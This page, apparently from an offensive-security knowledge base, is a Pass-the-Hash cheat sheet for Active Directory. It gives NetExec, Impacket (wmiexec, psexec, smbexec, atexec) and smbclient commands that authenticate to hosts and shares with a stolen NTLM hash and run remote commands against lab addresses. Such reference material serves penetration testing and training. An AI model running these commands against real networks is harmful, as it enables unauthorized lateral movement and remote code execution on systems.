Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / SMB / Access

NTLM Authentication

Pass-the-Hash over SMB uses an NTLM hash instead of a plaintext password. It is useful when we recover a local administrator hash, a domain account hash, or a service account hash and need to validate where it works.

NetExec domain hash

nxc smb 10.10.10.0/24 -d ootw.local -u Administrator -H NTLM_HASH
nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH --shares

NetExec local admin hash

nxc smb 10.10.10.0/24 -u Administrator -H NTLM_HASH --local-auth
nxc smb 10.10.10.201 -u Administrator -H NTLM_HASH --local-auth --shares

Impacket

wmiexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
psexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
smbexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
atexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH "whoami /all"

smbclient hash auth

smbclient //10.10.10.201/C$ -U Administrator --pw-nt-hash NTLM_HASH

Validate admin

nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH
nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH -x "whoami /all"

Notes

  • Pass-the-Hash does not require SMB signing to authenticate.
  • SMB signing blocks classic NTLM relay to SMB, not normal hash-based authentication with a valid account hash.